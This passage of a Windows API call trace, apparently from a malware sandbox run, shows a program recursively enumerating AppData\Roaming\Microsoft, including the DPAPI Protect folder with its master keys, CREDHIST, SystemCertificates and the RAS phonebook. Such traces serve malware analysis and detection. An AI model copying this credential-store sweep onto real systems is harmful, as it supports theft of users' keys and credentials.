hFindFile=0x586c20) returned 1 [0083.420] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.420] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.420] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.420] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.420] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.420] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="MMC" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC" [0083.420] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*" [0083.420] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.421] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.421] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.421] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.421] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.421] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="MS Project" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project" [0083.421] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*" [0083.421] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.421] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.421] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.421] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0083.421] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*" [0083.421] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.422] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.422] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.422] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="en-US" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0083.422] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*" [0083.422] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.422] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.422] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.422] PathMatchSpecW (pszFile="Global.MPT", pszSpec="*") returned 1 [0083.422] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.422] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.422] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.422] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.422] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.422] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.422] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.422] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Network" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network" [0083.422] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*" [0083.422] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.422] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.422] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.422] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network", pszFile="Connections" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0083.422] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0083.422] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.422] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.422] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.422] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="Pbk" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0083.422] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0083.422] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.422] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.422] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.422] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="_hiddenPbk" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0083.423] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0083.423] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.423] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.423] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.423] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*") returned 1 [0083.423] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.423] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.423] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.423] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.423] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.423] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.423] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.423] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.423] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.423] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Office" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office" [0083.423] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*" [0083.423] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.423] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.423] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.423] PathMatchSpecW (pszFile="MSO1033.acl", pszSpec="*") returned 1 [0083.423] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.423] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office", pszFile="Recent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0083.423] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0083.423] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.424] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.424] PathMatchSpecW (pszFile="Database1.LNK", pszSpec="*") returned 1 [0083.424] PathMatchSpecW (pszFile="Global.LNK", pszSpec="*") returned 1 [0083.424] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.424] PathMatchSpecW (pszFile="My Documents.LNK", pszSpec="*") returned 1 [0083.424] PathMatchSpecW (pszFile="receipt-parcel-UK980-456.LNK", pszSpec="*") returned 1 [0083.424] PathMatchSpecW (pszFile="Templates.LNK", pszSpec="*") returned 1 [0083.424] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.424] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.424] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="OneNote" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote" [0083.424] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*" [0083.424] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.425] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="16.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0" [0083.425] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*" [0083.425] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.425] PathMatchSpecW (pszFile="Preferences.dat", pszSpec="*") returned 1 [0083.425] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.425] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.425] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Outlook" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook" [0083.425] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0083.425] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.425] PathMatchSpecW (pszFile="Outlook.srs", pszSpec="*") returned 1 [0083.425] PathMatchSpecW (pszFile="Outlook.xml", pszSpec="*") returned 1 [0083.425] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.425] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="PowerPoint" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint" [0083.425] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*" [0083.425] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.425] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.425] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Proof" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof" [0083.425] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*" [0083.425] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.425] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.425] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Protect" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect" [0083.425] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*" [0083.425] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.426] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*") returned 1 [0083.426] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-2345716840-1148442690-1481144037-1000" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000" [0083.426] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*" [0083.426] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.426] PathMatchSpecW (pszFile="1862f3be-4467-4925-a93f-badcfb2203ba", pszSpec="*") returned 1 [0083.426] PathMatchSpecW (pszFile="1a231b4e-0d4b-4bef-bfe5-101dc3660c19", pszSpec="*") returned 1 [0083.426] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0083.426] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.426] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-3111613574-2524581245-2586426736-500" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" [0083.426] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*" [0083.426] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.426] PathMatchSpecW (pszFile="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", pszSpec="*") returned 1 [0083.426] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0083.426] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.427] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*") returned 1 [0083.427] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.427] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Publisher" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher" [0083.427] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*" [0083.427] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.427] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.427] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Publisher Building Blocks" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0083.427] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*" [0083.427] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.427] PathMatchSpecW (pszFile="ContentStore.xml", pszSpec="*") returned 1 [0083.427] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.427] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Speech" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech" [0083.427] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*" [0083.427] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.427] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.428] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="SystemCertificates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0083.428] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0083.428] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.428] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="My" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0083.428] PathCombineW (in: pszDest=0x18d720, 